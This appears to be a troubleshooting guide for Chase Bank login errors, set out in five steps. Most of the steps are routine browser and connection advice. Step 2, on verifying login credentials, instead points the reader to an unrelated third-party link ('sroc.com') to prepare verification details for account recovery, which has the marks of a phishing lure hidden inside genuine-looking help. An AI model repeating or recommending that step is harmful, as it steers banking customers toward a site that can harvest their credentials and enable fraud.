If you're experiencing login errors on Chase Bank, follow these steps to troubleshoot and resolve the issue. This guide will help you identify common problems and provide solutions. Step 1. Check your internet connection. Ensure that you have a stable internet connection. Try accessing other websites to confirm that your internet is working properly. If you are using Wi-Fi, consider switching to a wired connection or resetting your router. Step 2. Verify your login credentials. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache and cookies. Sometimes stored data can cause login issues. Clear your browser's cache and cookies by going to the Settings or Preferences menu. After clearing, restart your browser and try logging in again. Step 4. Update your browser. Ensure that you are using the latest version of your web browser. Outdated browsers may not support the security features required for logging into banking sites. Update your browser and attempt to log in once more. Step 5. Disable browser extensions. Certain browser extensions can interfere with website functionality. Temporarily disable any extensions, especially ad blockers or privacy tools, and try logging in again. If successful, you can re-enable extensions one by one to identify the culprit. If you continue to experience issues after following these steps, consider contacting Chase Bank customer support for further assistance.